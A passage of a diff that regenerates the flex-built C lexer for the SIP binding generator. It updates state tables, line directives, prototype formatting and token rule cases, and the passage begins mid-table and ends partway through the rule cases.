998, 999, 999, 999, 780, 990, 779, 777, 998, 1000, ++ 1000, 1000, 1035, 1035, 1035, 1036, 1036, 1036, 1037, 1037, ++ 1037, 991, 1038, 1038, 1038, 996, 776, 775, 993, 997, ++ 994, 774, 992, 773, 772, 995, 1039, 1039, 1039, 1040, ++ 1040, 1040, 1041, 1041, 1041, 1042, 1042, 1042, 771, 770, ++ 1035, 769, 1037, 1043, 1043, 1043, 768, 1036, 767, 766, ++ ++ 1038, 1076, 1076, 1076, 1077, 1077, 1077, 1078, 1078, 1078, ++ 765, 1079, 1079, 1079, 1039, 1080, 1080, 1080, 764, 1040, ++ 1081, 1081, 1081, 763, 1082, 1082, 1082, 762, 1041, 1083, ++ 1083, 1083, 761, 1042, 1113, 1113, 1113, 1114, 1114, 1114, ++ 1115, 1115, 1115, 1116, 1116, 1116, 1117, 1117, 1117, 1080, ++ 1115, 1078, 1118, 1118, 1118, 1077, 1076, 1079, 1082, 
1119, ++ 1119, 1119, 1147, 1147, 1147, 1148, 1148, 1148, 760, 727, ++ 1113, 1083, 1149, 1149, 1149, 1150, 1150, 1150, 1151, 1151, ++ 1151, 1173, 1173, 1173, 1174, 1174, 1174, 1175, 1175, 1175, ++ 726, 725, 1117, 724, 1116, 723, 722, 1118, 720, 719, ++ ++ 1147, 1176, 1176, 1176, 1196, 1196, 1196, 1197, 1197, 1197, ++ 1198, 1198, 1198, 718, 1148, 717, 1151, 1216, 1216, 1216, ++ 716, 715, 1149, 1217, 1217, 1217, 1231, 1231, 1231, 1173, ++ 1232, 1232, 1232, 1174, 1240, 1240, 1240, 1241, 1241, 1241, ++ 1247, 1247, 1247, 1232, 1248, 1248, 1248, 1252, 1252, 1252, ++ 714, 1176, 713, 712, 1197, 1196, 1254, 1254, 1254, 1216, ++ 1256, 1256, 1256, 1258, 1258, 1258, 1259, 1259, 1259, 711, ++ 710, 1241, 1217, 1231, 709, 708, 707, 705, 704, 702, ++ 1240, 700, 699, 698, 1252, 695, 694, 693, 689, 688, ++ 1248, 686, 685, 684, 683, 682, 681, 680, 1256, 679, ++ ++ 1254, 642, 641, 640, 639, 638, 637, 636, 635, 634, ++ 633, 632, 1258, 1261, 1261, 1261, 1261, 1262, 1262, 1262, ++ 1262, 1263, 1263, 1263, 1263, 1264, 1264, 1264, 1264, 1265, ++ 1265, 1266, 1266, 1267, 631, 1267, 1267, 630, 629, 627, ++ 626, 625, 623, 622, 621, 620, 619, 618, 617, 615, ++ 614, 613, 612, 611, 610, 609, 608, 607, 606, 605, ++ 604, 603, 602, 601, 600, 599, 598, 597, 596, 595, ++ 594, 593, 592, 549, 548, 547, 545, 544, 543, 542, ++ 541, 540, 539, 538, 537, 536, 535, 534, 533, 532, ++ 531, 530, 529, 528, 527, 526, 525, 524, 523, 522, ++ ++ 521, 520, 519, 518, 517, 516, 515, 514, 513, 512, ++ 511, 510, 509, 508, 507, 505, 504, 459, 456, 455, ++ 454, 453, 452, 451, 450, 449, 448, 447, 446, 445, ++ 444, 443, 442, 441, 440, 439, 438, 437, 436, 435, ++ 434, 433, 432, 431, 430, 429, 428, 427, 426, 425, ++ 424, 423, 422, 421, 420, 419, 418, 417, 416, 361, ++ 360, 359, 358, 357, 356, 355, 353, 352, 351, 350, ++ 349, 348, 347, 346, 345, 344, 343, 342, 341, 340, ++ 339, 338, 337, 336, 335, 334, 333, 332, 331, 329, ++ 328, 327, 325, 324, 323, 322, 321, 320, 281, 259, ++ ++ 258, 257, 256, 255, 254, 253, 251, 249, 248, 247, 
++ 246, 244, 242, 240, 239, 237, 236, 234, 233, 232, ++ 230, 228, 227, 226, 180, 178, 177, 152, 151, 149, ++ 148, 146, 145, 143, 141, 139, 133, 83, 79, 76, ++ 73, 52, 49, 43, 22, 21, 11, 9, 3, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, + +- 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, 1234, +- 1234, 1234, 1234, 1234, 1234 ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, ++ 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260, 1260 + } ; + + static yy_state_type yy_last_accepting_state; +@@ -1499,7 +1518,7 @@ int yy_flex_debug = 0; + #define YY_MORE_ADJ 0 + #define YY_RESTORE_YY_MORE_OFFSET + char *yytext; +-#line 1 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 1 "lexer.l" + /* + * The SIP lexer. + * +@@ -1517,7 +1536,7 @@ char *yytext; + * SIP is supplied WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + */ +-#line 20 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 20 "lexer.l" + #include <stdio.h> + #include <stdlib.h> + #include <string.h> +@@ -1563,11 +1582,9 @@ static int parenDepth = 0; + + static FILE *openFile(const char *); + static void fatallex(char *); ++#line 1586 "../lexer.c" + +- +- +- +-#line 1571 "sip-4.19.23/sipgen/lexer.c" ++#line 1588 "../lexer.c" + + #define INITIAL 0 + #define code 1 +@@ -1587,36 +1604,36 @@ static void fatallex(char *); + #define YY_EXTRA_TYPE void * + #endif + +-static int yy_init_globals (void ); ++static int yy_init_globals ( void ); + + /* Accessor methods to globals. + These are made visible to non-reentrant scanners for convenience. 
*/ + +-int yylex_destroy (void ); ++int yylex_destroy ( void ); + +-int yyget_debug (void ); ++int yyget_debug ( void ); + +-void yyset_debug (int debug_flag ); ++void yyset_debug ( int debug_flag ); + +-YY_EXTRA_TYPE yyget_extra (void ); ++YY_EXTRA_TYPE yyget_extra ( void ); + +-void yyset_extra (YY_EXTRA_TYPE user_defined ); ++void yyset_extra ( YY_EXTRA_TYPE user_defined ); + +-FILE *yyget_in (void ); ++FILE *yyget_in ( void ); + +-void yyset_in (FILE * in_str ); ++void yyset_in ( FILE * _in_str ); + +-FILE *yyget_out (void ); ++FILE *yyget_out ( void ); + +-void yyset_out (FILE * out_str ); ++void yyset_out ( FILE * _out_str ); + +-yy_size_t yyget_leng (void ); ++ int yyget_leng ( void ); + +-char *yyget_text (void ); ++char *yyget_text ( void ); + +-int yyget_lineno (void ); ++int yyget_lineno ( void ); + +-void yyset_lineno (int line_number ); ++void yyset_lineno ( int _line_number ); + + /* Macros after this point can all be overridden by user definitions in + * section 1. +@@ -1624,28 +1641,31 @@ void yyset_lineno (int line_number ); + + #ifndef YY_SKIP_YYWRAP + #ifdef __cplusplus +-extern "C" int yywrap (void ); ++extern "C" int yywrap ( void ); + #else +-extern int yywrap (void ); ++extern int yywrap ( void ); + #endif + #endif + +- static void yyunput (int c,char *buf_ptr ); ++#ifndef YY_NO_UNPUT + ++ static void yyunput ( int c, char *buf_ptr ); ++ ++#endif ++ + #ifndef yytext_ptr +-static void yy_flex_strncpy (char *,yyconst char *,int ); ++static void yy_flex_strncpy ( char *, const char *, int ); + #endif + + #ifdef YY_NEED_STRLEN +-static int yy_flex_strlen (yyconst char * ); ++static int yy_flex_strlen ( const char * ); + #endif + + #ifndef YY_NO_INPUT +- + #ifdef __cplusplus +-static int yyinput (void ); ++static int yyinput ( void ); + #else +-static int input (void ); ++static int input ( void ); + #endif + + #endif +@@ -1654,15 +1674,20 @@ static int input (void ); + static int yy_start_stack_depth = 0; + static int *yy_start_stack = NULL; + +- 
static void yy_push_state (int new_state ); ++ static void yy_push_state ( int _new_state ); + +- static void yy_pop_state (void ); ++ static void yy_pop_state ( void ); + +- static int yy_top_state (void ); ++ static int yy_top_state ( void ); + + /* Amount of stuff to slurp up with each read. */ + #ifndef YY_READ_BUF_SIZE ++#ifdef __ia64__ ++/* On IA-64, the buffer size is 16k, not 8k */ ++#define YY_READ_BUF_SIZE 16384 ++#else + #define YY_READ_BUF_SIZE 8192 ++#endif /* __ia64__ */ + #endif + + /* Copy whatever the last rule matched to the standard output. */ +@@ -1670,7 +1695,7 @@ static int input (void ); + /* This used to be an fputs(), but since the string might contain NUL's, + * we now use fwrite(). + */ +-#define ECHO fwrite( yytext, yyleng, 1, yyout ) ++#define ECHO do { if (fwrite( yytext, (size_t) yyleng, 1, yyout )) {} } while (0) + #endif + + /* Gets input and stuffs it into "buf". number of characters read, or YY_NULL, +@@ -1681,7 +1706,7 @@ static int input (void ); + if ( YY_CURRENT_BUFFER_LVALUE->yy_is_interactive ) \ + { \ + int c = '*'; \ +- yy_size_t n; \ ++ int n; \ + for ( n = 0; n < max_size && \ + (c = getc( yyin )) != EOF && c != '\n'; ++n ) \ + buf[n] = (char) c; \ +@@ -1694,7 +1719,7 @@ static int input (void ); + else \ + { \ + errno=0; \ +- while ( (result = fread(buf, 1, max_size, yyin))==0 && ferror(yyin)) \ ++ while ( (result = (int) fread(buf, 1, (yy_size_t) max_size, yyin)) == 0 && ferror(yyin)) \ + { \ + if( errno != EINTR) \ + { \ +@@ -1749,7 +1774,7 @@ extern int yylex (void); + + /* Code executed at the end of each rule. 
*/ + #ifndef YY_BREAK +-#define YY_BREAK break; ++#define YY_BREAK /*LINTED*/break; + #endif + + #define YY_RULE_SETUP \ +@@ -1762,15 +1787,10 @@ extern int yylex (void); + */ + YY_DECL + { +- register yy_state_type yy_current_state; +- register char *yy_cp, *yy_bp; +- register int yy_act; ++ yy_state_type yy_current_state; ++ char *yy_cp, *yy_bp; ++ int yy_act; + +-#line 74 "sip-4.19.23/sipgen/metasrc/lexer.l" +- +- +-#line 1773 "sip-4.19.23/sipgen/lexer.c" +- + if ( !(yy_init) ) + { + (yy_init) = 1; +@@ -1791,13 +1811,19 @@ YY_DECL + if ( ! YY_CURRENT_BUFFER ) { + yyensure_buffer_stack (); + YY_CURRENT_BUFFER_LVALUE = +- yy_create_buffer(yyin,YY_BUF_SIZE ); ++ yy_create_buffer( yyin, YY_BUF_SIZE ); + } + +- yy_load_buffer_state( ); ++ yy_load_buffer_state( ); + } + +- while ( 1 ) /* loops until end-of-file is reached */ ++ { ++#line 74 "lexer.l" ++ ++ ++#line 1825 "../lexer.c" ++ ++ while ( /*CONSTCOND*/1 ) /* loops until end-of-file is reached */ + { + yy_cp = (yy_c_buf_p); + +@@ -1814,7 +1840,7 @@ YY_DECL + yy_match: + do + { +- register YY_CHAR yy_c = yy_ec[YY_SC_TO_UI(*yy_cp)]; ++ YY_CHAR yy_c = yy_ec[YY_SC_TO_UI(*yy_cp)] ; + if ( yy_accept[yy_current_state] ) + { + (yy_last_accepting_state) = yy_current_state; +@@ -1823,13 +1849,13 @@ yy_match: + while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state ) + { + yy_current_state = (int) yy_def[yy_current_state]; +- if ( yy_current_state >= 1235 ) +- yy_c = yy_meta[(unsigned int) yy_c]; ++ if ( yy_current_state >= 1261 ) ++ yy_c = yy_meta[yy_c]; + } +- yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c]; ++ yy_current_state = yy_nxt[yy_base[yy_current_state] + yy_c]; + ++yy_cp; + } +- while ( yy_base[yy_current_state] != 2845 ); ++ while ( yy_base[yy_current_state] != 2950 ); + + yy_find_action: + yy_act = yy_accept[yy_current_state]; +@@ -1855,540 +1881,550 @@ do_action: /* This label is used only to + + case 1: + YY_RULE_SETUP +-#line 76 "sip-4.19.23/sipgen/metasrc/lexer.l" 
++#line 76 "lexer.l" + {BEGIN directive_start; return TK_API;} + YY_BREAK + case 2: + YY_RULE_SETUP +-#line 77 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 77 "lexer.l" + {BEGIN directive_start; return TK_AUTOPYNAME;} + YY_BREAK + case 3: + YY_RULE_SETUP +-#line 78 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 78 "lexer.l" + {return TK_CMODULE;} + YY_BREAK + case 4: + YY_RULE_SETUP +-#line 79 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 79 "lexer.l" + {BEGIN directive_start; return TK_COMPOMODULE;} + YY_BREAK + case 5: + YY_RULE_SETUP +-#line 80 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 80 "lexer.l" + {BEGIN directive_start; return TK_CONSMODULE;} + YY_BREAK + case 6: + YY_RULE_SETUP +-#line 81 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 81 "lexer.l" + {BEGIN directive_start; return TK_DEFDOCSTRFMT;} + YY_BREAK + case 7: + YY_RULE_SETUP +-#line 82 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 82 "lexer.l" + {BEGIN directive_start; return TK_DEFDOCSTRSIG;} + YY_BREAK + case 8: + YY_RULE_SETUP +-#line 83 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 83 "lexer.l" + {BEGIN directive_start; return TK_DEFENCODING;} + YY_BREAK + case 9: + YY_RULE_SETUP +-#line 84 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 84 "lexer.l" + {BEGIN directive_start; return TK_DEFMETATYPE;} + YY_BREAK + case 10: + YY_RULE_SETUP +-#line 85 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 85 "lexer.l" + {BEGIN directive_start; return TK_DEFSUPERTYPE;} + YY_BREAK + case 11: + YY_RULE_SETUP +-#line 86 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 86 "lexer.l" + {return TK_END;} + YY_BREAK + case 12: + YY_RULE_SETUP +-#line 87 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 87 "lexer.l" + {BEGIN INITIAL; return TK_END;} + YY_BREAK + case 13: + YY_RULE_SETUP +-#line 88 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 88 "lexer.l" + {return TK_EXCEPTION;} + YY_BREAK + case 14: + YY_RULE_SETUP +-#line 89 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 89 "lexer.l" + {BEGIN directive_start; return TK_FEATURE;} + 
YY_BREAK + case 15: + YY_RULE_SETUP +-#line 90 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 90 "lexer.l" + {BEGIN directive_start; return TK_HIDE_NS;} + YY_BREAK + case 16: + YY_RULE_SETUP +-#line 91 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 91 "lexer.l" + {return TK_IF;} + YY_BREAK + case 17: + YY_RULE_SETUP +-#line 92 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 92 "lexer.l" + {BEGIN directive_start; return TK_IMPORT;} + YY_BREAK + case 18: + YY_RULE_SETUP +-#line 93 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 93 "lexer.l" + {BEGIN directive_start; return TK_INCLUDE;} + YY_BREAK + case 19: + YY_RULE_SETUP +-#line 94 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 94 "lexer.l" + {BEGIN directive_start; return TK_LICENSE;} + YY_BREAK + case 20: + YY_RULE_SETUP +-#line 95 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 95 "lexer.l" + {return TK_MAPPEDTYPE;} + YY_BREAK + case 21: + YY_RULE_SETUP +-#line 96 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 96 "lexer.l" + {BEGIN directive_start; return TK_MODULE;} + YY_BREAK + case 22: + YY_RULE_SETUP +-#line 97 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 97 "lexer.l" + {return TK_OPTINCLUDE;} + YY_BREAK + case 23: + YY_RULE_SETUP +-#line 98 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 98 "lexer.l" + {return TK_PLATFORMS;} + YY_BREAK + case 24: + YY_RULE_SETUP +-#line 99 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 99 "lexer.l" + {BEGIN directive_start; return TK_PLUGIN;} + YY_BREAK + case 25: + YY_RULE_SETUP +-#line 100 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 100 "lexer.l" + {BEGIN directive_start; return TK_PROPERTY;} + YY_BREAK + case 26: + YY_RULE_SETUP +-#line 101 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 101 "lexer.l" + {return TK_TIMELINE;} + YY_BREAK + case 27: + YY_RULE_SETUP +-#line 103 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 103 "lexer.l" + {return TK_CLASS;} + YY_BREAK + case 28: + YY_RULE_SETUP +-#line 104 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 104 "lexer.l" + {return TK_STRUCT;} + YY_BREAK + 
case 29: + YY_RULE_SETUP +-#line 105 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 105 "lexer.l" + {return TK_PUBLIC;} + YY_BREAK + case 30: + YY_RULE_SETUP +-#line 106 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 106 "lexer.l" + {return TK_PROTECTED;} + YY_BREAK + case 31: + YY_RULE_SETUP +-#line 107 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 107 "lexer.l" + {return TK_PRIVATE;} + YY_BREAK + case 32: + YY_RULE_SETUP +-#line 108 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 108 "lexer.l" + {return TK_SIGNALS;} + YY_BREAK + case 33: + YY_RULE_SETUP +-#line 109 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 109 "lexer.l" + {return TK_SIGNALS;} + YY_BREAK + case 34: + YY_RULE_SETUP +-#line 110 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 110 "lexer.l" + {return TK_SIGNAL_METHOD;} + YY_BREAK + case 35: + YY_RULE_SETUP +-#line 111 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 111 "lexer.l" + {return TK_SLOTS;} + YY_BREAK + case 36: + YY_RULE_SETUP +-#line 112 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 112 "lexer.l" + {return TK_SLOTS;} + YY_BREAK + case 37: + YY_RULE_SETUP +-#line 113 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 113 "lexer.l" + {return TK_SLOT_METHOD;} + YY_BREAK + case 38: + YY_RULE_SETUP +-#line 114 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 114 "lexer.l" + {return TK_CHAR;} + YY_BREAK + case 39: + YY_RULE_SETUP +-#line 115 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 115 "lexer.l" + {return TK_WCHAR_T;} + YY_BREAK + case 40: + YY_RULE_SETUP +-#line 116 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 116 "lexer.l" + {return TK_BOOL;} + YY_BREAK + case 41: + YY_RULE_SETUP +-#line 117 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 117 "lexer.l" + {return TK_SHORT;} + YY_BREAK + case 42: + YY_RULE_SETUP +-#line 118 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 118 "lexer.l" + {return TK_INT;} + YY_BREAK + case 43: + YY_RULE_SETUP +-#line 119 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 119 "lexer.l" + {return TK_LONG;} + YY_BREAK + case 44: + YY_RULE_SETUP 
+-#line 120 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 120 "lexer.l" + {return TK_FLOAT;} + YY_BREAK + case 45: + YY_RULE_SETUP +-#line 121 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 121 "lexer.l" + {return TK_DOUBLE;} + YY_BREAK + case 46: + YY_RULE_SETUP +-#line 122 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 122 "lexer.l" + {return TK_VOID;} + YY_BREAK + case 47: + YY_RULE_SETUP +-#line 123 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 123 "lexer.l" + {return TK_VIRTUAL;} + YY_BREAK + case 48: + YY_RULE_SETUP +-#line 124 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 124 "lexer.l" + {return TK_ENUM;} + YY_BREAK + case 49: + YY_RULE_SETUP +-#line 125 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 125 "lexer.l" + {return TK_SIGNED;} + YY_BREAK + case 50: + YY_RULE_SETUP +-#line 126 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 126 "lexer.l" + {return TK_UNSIGNED;} + YY_BREAK + case 51: + YY_RULE_SETUP +-#line 127 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 127 "lexer.l" + {return TK_CONST;} + YY_BREAK + case 52: + YY_RULE_SETUP +-#line 128 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 128 "lexer.l" + {return TK_STATIC;} + YY_BREAK + case 53: + YY_RULE_SETUP +-#line 129 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 129 "lexer.l" + {return TK_TRUE_VALUE;} + YY_BREAK + case 54: + YY_RULE_SETUP +-#line 130 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 130 "lexer.l" + {return TK_FALSE_VALUE;} + YY_BREAK + case 55: + YY_RULE_SETUP +-#line 131 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 131 "lexer.l" + {return TK_NULL_VALUE;} + YY_BREAK + case 56: + YY_RULE_SETUP +-#line 132 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 132 "lexer.l" + {return TK_TYPEDEF;} + YY_BREAK + case 57: + YY_RULE_SETUP +-#line 133 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 133 "lexer.l" + {return TK_NAMESPACE;} + YY_BREAK + case 58: + YY_RULE_SETUP +-#line 134 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 134 "lexer.l" + {return TK_OPERATOR;} + YY_BREAK + case 59: + YY_RULE_SETUP +-#line 135 
"sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 135 "lexer.l" + {return TK_THROW;} + YY_BREAK + case 60: + YY_RULE_SETUP +-#line 136 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 136 "lexer.l" + {return TK_EXPLICIT;} + YY_BREAK + case 61: + YY_RULE_SETUP +-#line 137 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 137 "lexer.l" + {return TK_TEMPLATE;} + YY_BREAK + case 62: + YY_RULE_SETUP +-#line 138 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 138 "lexer.l" + {return TK_FINAL;} + YY_BREAK + case 63: + YY_RULE_SETUP +-#line 139 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 139 "lexer.l" + {return TK_SIZET;} + YY_BREAK + case 64: + YY_RULE_SETUP +-#line 140 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 140 "lexer.l" + {return TK_SCOPE;} + YY_BREAK + case 65: + YY_RULE_SETUP +-#line 141 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 141 "lexer.l" + {return TK_LOGICAL_OR;} + YY_BREAK + case 66: + YY_RULE_SETUP +-#line 142 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 142 "lexer.l" + {return TK_PYOBJECT;} + YY_BREAK + case 67: + YY_RULE_SETUP +-#line 143 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 143 "lexer.l" + {return TK_PYTUPLE;} + YY_BREAK + case 68: + YY_RULE_SETUP +-#line 144 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 144 "lexer.l" + {return TK_PYLIST;} + YY_BREAK + case 69: + YY_RULE_SETUP +-#line 145 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 145 "lexer.l" + {return TK_PYDICT;} + YY_BREAK + case 70: + YY_RULE_SETUP +-#line 146 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 146 "lexer.l" + {return TK_PYCALLABLE;} + YY_BREAK + case 71: + YY_RULE_SETUP +-#line 147 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 147 "lexer.l" + {return TK_PYSLICE;} + YY_BREAK + case 72: + YY_RULE_SETUP +-#line 148 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 148 "lexer.l" + {return TK_PYTYPE;} + YY_BREAK + case 73: + YY_RULE_SETUP +-#line 149 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 149 "lexer.l" + {return TK_PYBUFFER;} + YY_BREAK + case 74: + YY_RULE_SETUP +-#line 150 
"sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 150 "lexer.l" + {return TK_SIPSIGNAL;} + YY_BREAK + case 75: + YY_RULE_SETUP +-#line 151 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 151 "lexer.l" + {return TK_SIPSLOT;} + YY_BREAK + case 76: + YY_RULE_SETUP +-#line 152 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 152 "lexer.l" + {return TK_SIPANYSLOT;} + YY_BREAK + case 77: + YY_RULE_SETUP +-#line 153 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 153 "lexer.l" + {return TK_SIPRXCON;} + YY_BREAK + case 78: + YY_RULE_SETUP +-#line 154 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 154 "lexer.l" + {return TK_SIPRXDIS;} + YY_BREAK + case 79: + YY_RULE_SETUP +-#line 155 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 155 "lexer.l" + {return TK_SIPSLOTCON;} + YY_BREAK + case 80: + YY_RULE_SETUP +-#line 156 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 156 "lexer.l" + {return TK_SIPSLOTDIS;} + YY_BREAK + case 81: + YY_RULE_SETUP +-#line 157 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 157 "lexer.l" + {return TK_SIPSSIZET;} + YY_BREAK + case 82: + YY_RULE_SETUP +-#line 158 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_QOBJECT;} ++#line 158 "lexer.l" ++{return TK_SIPSSIZET;} + YY_BREAK + case 83: + YY_RULE_SETUP +-#line 159 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_ELLIPSIS;} ++#line 159 "lexer.l" ++{return TK_QOBJECT;} + YY_BREAK + case 84: + YY_RULE_SETUP +-#line 161 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_FORMAT;} ++#line 160 "lexer.l" ++{return TK_ELLIPSIS;} + YY_BREAK + case 85: + YY_RULE_SETUP +-#line 162 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_GET;} ++#line 162 "lexer.l" ++{return TK_FORMAT;} + YY_BREAK + case 86: + YY_RULE_SETUP +-#line 163 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_ID;} ++#line 163 "lexer.l" ++{return TK_GET;} + YY_BREAK + case 87: + YY_RULE_SETUP +-#line 164 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_KWARGS;} ++#line 164 "lexer.l" ++{return TK_ID;} + YY_BREAK + case 88: + YY_RULE_SETUP +-#line 165 
"sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_LANGUAGE;} ++#line 165 "lexer.l" ++{return TK_KWARGS;} + YY_BREAK + case 89: + YY_RULE_SETUP +-#line 166 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_LICENSEE;} ++#line 166 "lexer.l" ++{return TK_LANGUAGE;} + YY_BREAK + case 90: + YY_RULE_SETUP +-#line 167 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_NAME;} ++#line 167 "lexer.l" ++{return TK_LICENSEE;} + YY_BREAK + case 91: + YY_RULE_SETUP +-#line 168 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_OPTIONAL;} ++#line 168 "lexer.l" ++{return TK_NAME;} + YY_BREAK + case 92: + YY_RULE_SETUP +-#line 169 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_ORDER;} ++#line 169 "lexer.l" ++{return TK_OPTIONAL;} + YY_BREAK + case 93: + YY_RULE_SETUP +-#line 170 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_REMOVELEADING;} ++#line 170 "lexer.l" ++{return TK_ORDER;} + YY_BREAK + case 94: + YY_RULE_SETUP +-#line 171 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_SET;} ++#line 171 "lexer.l" ++{return TK_REMOVELEADING;} + YY_BREAK + case 95: + YY_RULE_SETUP +-#line 172 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_SIGNATURE;} ++#line 172 "lexer.l" ++{return TK_SET;} + YY_BREAK + case 96: + YY_RULE_SETUP +-#line 173 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_TIMESTAMP;} ++#line 173 "lexer.l" ++{return TK_SIGNATURE;} + YY_BREAK + case 97: + YY_RULE_SETUP +-#line 174 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_TYPE;} ++#line 174 "lexer.l" ++{return TK_TIMESTAMP;} + YY_BREAK + case 98: + YY_RULE_SETUP +-#line 175 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_USEARGNAMES;} ++#line 175 "lexer.l" ++{return TK_TYPE;} + YY_BREAK + case 99: + YY_RULE_SETUP +-#line 176 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_USELIMITEDAPI;} ++#line 176 "lexer.l" ++{return TK_USEARGNAMES;} + YY_BREAK + case 100: + YY_RULE_SETUP +-#line 177 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_ALLRAISEPYEXC;} ++#line 177 "lexer.l" ++{return TK_PYSSIZETCLEAN;} + 
